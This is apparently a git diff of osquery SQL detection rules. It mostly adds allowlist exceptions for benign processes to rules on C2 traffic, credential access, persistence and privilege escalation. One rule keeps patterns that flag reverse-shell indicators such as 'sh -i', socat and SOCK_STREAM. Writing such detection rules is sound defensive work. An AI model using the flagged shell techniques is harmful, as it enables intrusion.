diff --git a/detection/c2/unexpected-dns-traffic.sql b/detection/c2/unexpected-dns-traffic.sql index 8d45c09..7191d80 100644 --- a/detection/c2/unexpected-dns-traffic.sql +++ b/detection/c2/unexpected-dns-traffic.sql @@ -80,6 +80,7 @@ WHERE AND exception_key NOT IN ( 'coredns,0.0.0.0,53', 'nessusd,50.16.123.71,53', + 'Arc Helper,1.0.0.1,53', 'syncthing,46.162.192.181,53' ) -- Local DNS servers and custom clients go here diff --git a/detection/c2/unexpected-https-client-linux.sql b/detection/c2/unexpected-https-client-linux.sql index d022f5e..2182a3e 100644 --- a/detection/c2/unexpected-https-client-linux.sql +++ b/detection/c2/unexpected-https-client-linux.sql @@ -66,6 +66,7 @@ WHERE AND NOT exception_key IN ( '0,/opt/snapd,0u,0g,snapd', '0,/usr/bash,0u,0g,mkinitcpio', + '0,/usr/containerd,u,g,containerd', '0,/usr/dockerd,0u,0g,dockerd', '0,/usr/flatpak-system-helper,0u,0g,flatpak-system-', '0,/usr/launcher,0u,0g,launcher', @@ -75,6 +76,7 @@ WHERE '0,/usr/python3.10,0u,0g,dnf', '0,/usr/tailscaled,0u,0g,tailscaled', '0,/usr/.tailscaled-wrapped,0u,0g,.tailscaled-wra', + '105,/usr/http,0u,0g,https', '500,/app/slack,u,g,slack', '500,/app/thunderbird,u,g,thunderbird', '500,/app/zoom.real,u,g,zoom.real', @@ -93,6 +95,7 @@ WHERE '500,/opt/slack,0u,0g,slack', '500,/opt/spotify,0u,0g,spotify', '500,/usr/abrt-action-generate-core-backtrace,0u,0g,abrt-action-gen', + '500,/usr/cargo,0u,0g,cargo', '500,/usr/chainctl,0u,0g,chainctl', '500,/usr/chrome,0u,0g,chrome', '500,/usr/code,0u,0g,code', @@ -110,10 +113,13 @@ WHERE '500,/usr/go,500u,500g,go', '500,/usr/gvfsd-http,0u,0g,gvfsd-http', '500,/usr/java,0u,0g,java', + '500,/home/grype,500u,500g,grype', '500,/usr/kubectl,500u,500g,kubectl', + '500,/usr/signal-desktop,0u,0g,signal-desktop', '500,/usr/slack,0u,0g,slack', '500,/usr/syncthing,0u,0g,syncthing', '500,/usr/terraform,0u,0g,terraform', + '500,/usr/trivy,0u,0g,trivy', '500,/usr/WebKitNetworkProcess,0u,0g,WebKitNetworkPr', '500,/usr/xmobar,0u,0g,xmobar', '500,/usr/yay,0u,0g,yay' diff --git a/detection/c2/unexpected-talkers-linux.sql b/detection/c2/unexpected-talkers-linux.sql index ddce3b6..e8bc213 100644 --- a/detection/c2/unexpected-talkers-linux.sql +++ b/detection/c2/unexpected-talkers-linux.sql @@ -86,6 +86,7 @@ WHERE '143,6,500,/app/thunderbird,u,g,thunderbird', '22000,6,500,/usr/syncthing,0u,0g,syncthing', '22,6,500,/usr/ssh,0u,0g,ssh', + '3478,6,500,/opt/chrome,0u,0g,chrome', '4070,6,500,/opt/spotify,0u,0g,spotify', '5228,6,500,/opt/chrome,0u,0g,chrome', '5228,6,500,/usr/chrome,0u,0g,chrome', @@ -95,9 +96,11 @@ WHERE '80,6,0,/usr/NetworkManager,0u,0g,NetworkManager', '80,6,0,/usr/packagekitd,0u,0g,packagekitd', '80,6,0,/usr/pacman,0u,0g,pacman', + '80,6,500,/usr/pacman,0u,0g,pacman', '80,6,0,/usr/python3.10,0u,0g,yum', '80,6,0,/usr/tailscaled,0u,0g,tailscaled', '80,6,0,/usr/.tailscaled-wrapped,0u,0g,.tailscaled-wra', + '80,6,105,/usr/http,0u,0g,http', '80,6,500,/app/thunderbird,u,g,thunderbird', '80,6,500,/opt/chrome,0u,0g,chrome', '80,6,500,/opt/firefox,0u,0g,firefox', diff --git a/detection/c2/unexpected-talkers-macos.sql b/detection/c2/unexpected-talkers-macos.sql index 36ea03e..98449c8 100644 --- a/detection/c2/unexpected-talkers-macos.sql +++ b/detection/c2/unexpected-talkers-macos.sql @@ -183,6 +183,7 @@ WHERE '443,6,500,git-remote-http,git-remote-http-555549448cff17dcad50330caee64c85205e6a99,', '443,6,500,git-remote-http,git-remote-http-5555494493930c47f9d9385e94cdee8b19968153,', '443,6,500,git-remote-http,git-remote-http-55554944ce011d0e889a3cf58e5ac97ac15728f3,', + '443,6,500,git-remote-http,git-remote-http-55554944e0748565fb2d356b9eb3edf61873140d,', '443,6,500,git-remote-http,git-remote-http-55554944e5dca79a2b44332e941af547708b0c68,', '443,6,500,gitsign,,', '443,6,500,gitsign,a.out,', @@ -224,6 +225,7 @@ WHERE '443,6,500,Slack Helper,,', '443,6,500,Slack Helper,com.tinyspeck.slackmacgap.helper,Apple Mac OS Application Signing', '443,6,500,Slack Helper,com.tinyspeck.slackmacgap.helper,Developer ID Application: Slack Technologies, Inc. (BQR82RBBHL)', + '443,6,500,snyk,snyk_darwin_amd64,Developer ID Application: Snyk Limited (97QYW7LHSF)', '443,6,500,steam_osx,com.valvesoftware.steam,Developer ID Application: Valve Corporation (MXGJJ98X76)', '443,6,500,step,step,', '443,6,500,sublime_text,com.sublimetext.4,Developer ID Application: Sublime HQ Pty Ltd (Z6D26JE4Y4)', diff --git a/detection/collection/high-disk-bytes-written.sql b/detection/collection/high-disk-bytes-written.sql index 3493c05..00cfd5e 100644 --- a/detection/collection/high-disk-bytes-written.sql +++ b/detection/collection/high-disk-bytes-written.sql @@ -33,6 +33,7 @@ WHERE AND p.path NOT IN ( '/bin/bash', '/opt/homebrew/bin/qemu-system-aarch64', + '/usr/bin/apt', '/usr/bin/aptd', '/usr/bin/bash', '/usr/bin/bwrap', @@ -41,6 +42,7 @@ WHERE '/usr/bin/dockerd', '/usr/bin/fish', '/usr/bin/gnome-shell', + '/usr/bin/gnome-software', '/usr/bin/make', '/usr/bin/melange', '/usr/bin/qemu-system-x86_64', @@ -96,14 +98,14 @@ WHERE 'containerd', 'esbuild', 'firefox', + 'fsdaemon', 'go', - 'grype', 'goland', - 'java', - 'launcher', 'gopls', + 'grype', + 'java', 'jetbrains-toolb', - 'slack', + 'launcher', 'slack', 'wineserver' ) diff --git a/detection/credentials/unexpected-sensitive-file-access-linux.sql b/detection/credentials/unexpected-sensitive-file-access-linux.sql index cdd5529..7024051 100644 --- a/detection/credentials/unexpected-sensitive-file-access-linux.sql +++ b/detection/credentials/unexpected-sensitive-file-access-linux.sql @@ -79,6 +79,7 @@ WHERE 'chrome_crashpad_handler,chrome_crashpad,~/.config/google-chrome', 'chrome,chrome,~/.config/google-chrome', 'firefox,.firefox-wrappe,~/.cache/mozilla', + 'firefox,Web Content,~/.mozilla/firefox', 'firefox,.firefox-wrappe,~/.mozilla/firefox', 'firefox,file:// Content,~/.mozilla/firefox', 'firefox,firefox,~/.cache/mozilla', diff --git a/detection/evasion/hidden-cwd.sql b/detection/evasion/hidden-cwd.sql index 8708287..2bf8b8b 100644 --- a/detection/evasion/hidden-cwd.sql +++ b/detection/evasion/hidden-cwd.sql @@ -1,4 +1,4 @@ --- Programs running with a hidden current working directory +-- Programs running with a hidden current working directory (state-based) -- -- false positives: -- * Users rummaging through their configuration files @@ -68,9 +68,11 @@ WHERE 'npm install,~/.npm/_cacache', 'mysqld,~/.local/share' ) + OR exception_key LIKE '%sh,~/.Trash/%' OR dir IN ( '~/.config', '~/.vim', + '~/.terraform.d', '~/.cache/yay', '~/.local/share/chezmoi', '~/.local/share/nvim', @@ -104,4 +106,7 @@ WHERE OR dir LIKE '~/%/.terraform%' OR dir LIKE '~/.vscode/extensions/%' OR dir LIKE '~/.zsh/%' + OR dir LIKE '~/%/.git' + -- For sudo calls to other things + OR (dir LIKE '/home/.terraform.d/%' AND p.euid = 0) ) diff --git a/detection/evasion/unexpected-kernel-modules-linux.sql b/detection/evasion/unexpected-kernel-modules-linux.sql index 509b836..6815815 100644 --- a/detection/evasion/unexpected-kernel-modules-linux.sql +++ b/detection/evasion/unexpected-kernel-modules-linux.sql @@ -60,6 +60,7 @@ WHERE 'cmac', 'configfs', 'coretemp', + 'cpuid', 'cqhci', 'crc16', 'crc32c_generic', @@ -194,6 +195,7 @@ WHERE 'ip6table_nat', 'ip6table_raw', 'ip6_tables', + 'ip6table_security', 'ip6t_REJECT', 'ip6t_rpfilter', 'ip6t_rt', diff --git a/detection/evasion/unexpected-var-executables-macos.sql b/detection/evasion/unexpected-var-executables-macos.sql index dd4f36b..4a7f216 100644 --- a/detection/evasion/unexpected-var-executables-macos.sql +++ b/detection/evasion/unexpected-var-executables-macos.sql @@ -14,11 +14,14 @@ SELECT file.mtime, file.size, hash.sha256, - magic.data + magic.data, + signature.authority, + signature.identifier FROM file LEFT JOIN hash on file.path = hash.path LEFT JOIN magic ON file.path = magic.path + LEFT JOIN signature ON file.path = signature.path WHERE ( -- This list is the result of multiple queries combined and can likely be minimized @@ -42,6 +45,7 @@ WHERE AND file.path NOT LIKE '/var/tmp/IN_PROGRESS_sysdiagnose_%.tmp/mddiagnose.mdsdiagnostic/diagnostic.log' AND file.path NOT LIKE '/var/tmp/epdfinfo%' AND file.path NOT LIKE '/var/folders%/T/sp_relauncher' + AND file.path NOT LIKE '/var/folders/pv/%/C/com.apple.FontRegistry/annex_aux' AND ( file.mode LIKE '%7%' or file.mode LIKE '%5%' diff --git a/detection/execution/exotic-command-events-linux.sql b/detection/execution/exotic-command-events-linux.sql index b9b1d58..95d92b2 100644 --- a/detection/execution/exotic-command-events-linux.sql +++ b/detection/execution/exotic-command-events-linux.sql @@ -103,7 +103,7 @@ WHERE OR cmd LIKE '%sh -i' OR cmd LIKE '%socat%' OR cmd LIKE '%SOCK_STREAM%' - OR cmd LIKE '%Socket.%' + OR (cmd LIKE '%Socket.%' AND NOT cmd LIKE '%ipc-socket%') ) -- Things that could reasonably happen at boot. AND NOT ( p.path IN ('/usr/bin/kmod', '/bin/kmod') @@ -135,3 +135,4 @@ WHERE AND NOT cmd IN ('lsmod') -- Seen on Ubuntu AND NOT cmd LIKE 'rm -f /tmp/apt-key-gpghome.%/pubring.gpg' + AND NOT cmd LIKE 'rm -f /var/tmp/mkinitramfs_%' diff --git a/detection/execution/recently-created-executables-linux.sql b/detection/execution/recently-created-executables-linux.sql index b41c4b2..cb3e621 100644 --- a/detection/execution/recently-created-executables-linux.sql +++ b/detection/execution/recently-created-executables-linux.sql @@ -37,6 +37,7 @@ WHERE AND (p.start_time - MAX(f.ctime, f.btime)) < 180 AND p.start_time >= MAX(f.ctime, f.ctime) AND NOT f.directory IN ('/usr/lib/firefox', '/usr/local/kolide-k2/bin') -- Typically daemons or long-running desktop apps + -- These are binaries that get installed/updated often enough that we should just mask them AND NOT p.path IN ( '', '/opt/google/chrome/chrome', @@ -46,6 +47,9 @@ WHERE '/usr/bin/dockerd', '/usr/bin/gedit', '/usr/bin/obs', + '/usr/bin/docker-proxy', + '/usr/lib/google-cloud-sdk/platform/bundledpythonunix/bin/python3', + '/usr/lib/snapd/snapd', '/usr/bin/pipewire', '/usr/bin/tailscaled', '/usr/bin/udevadm', @@ -68,6 +72,7 @@ WHERE '/usr/lib/systemd/systemd-timesyncd', '/usr/lib/x86_64-linux-gnu/obs-plugins/obs-browser-page', '/usr/lib/xf86-video-intel-backlight-helper', + '/usr/bin/containerd-shim-runc-v2', '/usr/sbin/chronyd', '/usr/sbin/cupsd', '/usr/sbin/tailscaled' diff --git a/detection/execution/recently-created-executables-macos.sql b/detection/execution/recently-created-executables-macos.sql index 390d169..10c55d8 100644 --- a/detection/execution/recently-created-executables-macos.sql +++ b/detection/execution/recently-created-executables-macos.sql @@ -52,6 +52,7 @@ WHERE 'Developer ID Application: Galvanix (5BRAQAFB8B)', 'Developer ID Application: General Arcade (Pte. Ltd.) (S8JLSG5ES7)', 'Developer ID Application: GEORGE NACHMAN (H7V7XYVQ7D)', + 'Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)', 'Developer ID Application: JetBrains s.r.o. (2ZEFAR8TH3)', 'Developer ID Application: GitHub (VEKTX9H2N7)', 'Developer ID Application: Google LLC (EQHXZ8M8AV)', @@ -83,6 +84,7 @@ WHERE AND NOT p.path LIKE '/private/var/folders/%/T/pulumi-go.%' AND NOT p.path LIKE '/Users/%/bin/%' AND NOT p.path LIKE '/Users/%/code/%' + AND NOT p.path LIKE '/Users/%/src/%' AND NOT p.path LIKE '/Users/%/Library/Application Support/%/Contents/MacOS/%' AND NOT p.path LIKE '/Users/%/Library/Application Support/iTerm2/iTermServer-%' AND NOT p.path LIKE '/Users/%/Library/Caches/%/Contents/MacOS/%' @@ -94,6 +96,7 @@ WHERE AND NOT p.path LIKE '/usr/local/Cellar/%' AND NOT p.path LIKE '/usr/local/kolide-k2/bin/osqueryd-updates/%/osqueryd' AND NOT p.path LIKE '%/.vscode/extensions/%' + AND NOT p.path LIKE '/Users/%/Library/Caches/snyk/%/snyk-macos' AND NOT ( p.path LIKE '/Users/%' AND p.uid > 499 diff --git a/detection/execution/sketchy-fetcher.sql b/detection/execution/sketchy-fetcher.sql index 42955db..b037cdc 100644 --- a/detection/execution/sketchy-fetcher.sql +++ b/detection/execution/sketchy-fetcher.sql @@ -80,6 +80,7 @@ WHERE OR parent_cmdline LIKE '/nix/store/%-builder.sh' OR p.cmdline LIKE 'git %' OR p.cmdline LIKE '%LICENSES/vendor/%' + OR p.cmdline LIKE 'curl -sL wttr.in%' OR p.cmdline LIKE '%localhost:%' OR p.cmdline LIKE '%127.0.0.1:%' OR p.name IN ('apko') diff --git a/detection/execution/unexpected-execdir-events-macos.sql b/detection/execution/unexpected-execdir-events-macos.sql index 543c002..36c51e8 100644 --- a/detection/execution/unexpected-execdir-events-macos.sql +++ b/detection/execution/unexpected-execdir-events-macos.sql @@ -96,6 +96,7 @@ WHERE AND dirname NOT LIKE '/usr/libexec/%' AND dirname NOT LIKE '/usr/local/%' AND dirname NOT LIKE '/Volumes/com.getdropbox.dropbox-%' + AND dirname NOT LIKE '/private/tmp/KSInstallAction.%/Install Google Software Update.app/Contents/Helpers' -- Unexplained data issue AND dirname NOT LIKE '../%' AND p.path NOT IN ( diff --git a/detection/execution/unexpected-osascript-calls.sql b/detection/execution/unexpected-osascript-calls.sql index a806e1c..cba7210 100644 --- a/detection/execution/unexpected-osascript-calls.sql +++ b/detection/execution/unexpected-osascript-calls.sql @@ -48,6 +48,7 @@ WHERE p.path = '/usr/bin/osascript' AND p.time > (strftime('%s', 'now') -60) AND exception_key NOT IN ( + ',,osascript', 'com.vng.zalo,Developer ID Application: VNG ONLINE CO.,LTD (CVB6BX97VM),osascript -ss' ) AND cmd NOT IN ('osascript -e user locale of (get system info)') diff --git a/detection/exfil/high_disk_bytes_read.sql b/detection/exfil/high_disk_bytes_read.sql index 62c4083..43ba0e9 100644 --- a/detection/exfil/high_disk_bytes_read.sql +++ b/detection/exfil/high_disk_bytes_read.sql @@ -39,13 +39,14 @@ WHERE 'emacs', 'firefox', 'fish', + 'fleet_backend', + 'fsdaemon', 'GoogleSoftwareUpdateAgent', 'gopls', 'java', 'launcher', 'LogiFacecamService', 'nautilus', - 'systemd', 'nessusd', 'nix', 'osqueryd', @@ -53,18 +54,22 @@ WHERE 'qemu-system-x86', 'qemu-system-x86-64', 'slack', + 'systemd', 'wineserver', 'ykman-gui', 'zsh' ) AND NOT p.path IN ( + '/usr/bin/apt', '/usr/bin/darktable', '/usr/bin/dockerd', '/usr/bin/gnome-shell', '/usr/bin/udevadm', '/usr/libexec/aned', '/usr/libexec/coreduetd', + '/usr/libexec/flatpak-system-helper', '/usr/libexec/logd', + '/usr/libexec/logd_helper', '/usr/libexec/packagekitd', '/usr/libexec/PerfPowerServices', '/usr/libexec/signpost_reporter', diff --git a/detection/persistence/unexpected-active-systemd-units.sql b/detection/persistence/unexpected-active-systemd-units.sql index 38c2b89..98c52b5 100644 --- a/detection/persistence/unexpected-active-systemd-units.sql +++ b/detection/persistence/unexpected-active-systemd-units.sql @@ -10,6 +10,8 @@ SELECT description AS 'desc', fragment_path AS path, + MAX(user, "root") AS effective_user, + following, hash.sha256, file.ctime, file.size, @@ -381,9 +383,10 @@ WHERE 'zpool-trim.timer,zpool-trim.timer,,0' ) OR exception_key LIKE 'machine-qemu%,Virtual Machine qemu%,,300' + OR exception_key LIKE 'dbus-:1.%-org.freedesktop.problems@%.service,dbus-:%.%-org.freedesktop.problems@%.service,0,200' OR id LIKE 'blockdev@dev-mapper-luks%.target' OR id LIKE 'blockdev@dev-mapper-nvme%.target' - OR id LIKE 'dbus-:%-org.freedesktop.problems@0.service' + OR id LIKE '' OR id LIKE 'dev-disk-by%.swap' OR id LIKE 'dev-mapper-%.swap' OR id LIKE 'dev-zram%.swap' diff --git a/detection/persistence/unexpected-uid0-daemon-linux.sql b/detection/persistence/unexpected-uid0-daemon-linux.sql index c60bc13..d6098a7 100644 --- a/detection/persistence/unexpected-uid0-daemon-linux.sql +++ b/detection/persistence/unexpected-uid0-daemon-linux.sql @@ -50,6 +50,8 @@ WHERE '/usr/bin/containerd', '/usr/bin/containerd-shim-runc-v2', '/usr/bin/crond', + '/usr/bin/dbus-daemon', + '/usr/bin/dbus-launch', '/usr/bin/dockerd', '/usr/bin/docker-proxy', '/usr/bin/fish', @@ -61,10 +63,6 @@ WHERE '/usr/bin/pacman', '/usr/bin/sshd', '/usr/bin/tailscaled', - '/usr/libexec/xdg-permission-store', - '/usr/libexec/xdg-document-portal', - '/usr/bin/dbus-daemon', - '/usr/bin/dbus-launch', '/usr/bin/wpa_supplicant', '/usr/libexec/accounts-daemon', '/usr/libexec/docker/docker-proxy', @@ -76,8 +74,11 @@ WHERE '/usr/libexec/snapd/snapd', '/usr/libexec/sssd/sssd_kcm', '/usr/libexec/udisks2/udisksd', + '/usr/libexec/xdg-document-portal', + '/usr/libexec/xdg-permission-store', '/usr/lib/flatpak-system-helper', '/usr/lib/gdm-session-worker', + '/usr/lib/snapd/snapd', '/usr/lib/software-properties/software-properties-dbus', '/usr/lib/systemd/systemd', '/usr/lib/systemd/systemd-homed', diff --git a/detection/privesc/unexpected-privilege-escalation-events.sql b/detection/privesc/unexpected-privilege-escalation-events.sql index a56e6ea..e225310 100644 --- a/detection/privesc/unexpected-privilege-escalation-events.sql +++ b/detection/privesc/unexpected-privilege-escalation-events.sql @@ -36,20 +36,19 @@ WHERE p.time > (strftime('%s', 'now') -30) AND p.euid < pp.euid AND p.path NOT IN ( + '/bin/ps', + '/usr/bin/doas', '/usr/bin/fusermount', '/usr/bin/fusermount3', '/usr/bin/login', '/usr/bin/sudo', - '/usr/bin/doas', - '/bin/ps', - '/usr/bin/top' + '/usr/bin/top', + '/usr/lib/snapd/snap-confine', + '/usr/lib/snapd/snap-update-ns' ) AND p.path NOT LIKE '/nix/store/%/bin/sudo' AND p.path NOT LIKE '/nix/store/%/bin/dhcpcd' - AND NOT ( - p.path LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine' - AND parent_path = '/usr/lib/systemd/systemd' - ) + AND p.path NOT LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine' AND NOT ( child_name = 'polkit-agent-helper-1' AND parent_path = '/usr/bin/gnome-shell' @@ -58,3 +57,7 @@ WHERE child_name = 'fusermount3' AND parent_path = '/usr/lib/xdg-document-portal' ) + AND NOT ( + child_name IN ('dash', 'pkexec') + AND parent_path = '/usr/bin/update-notifier' + )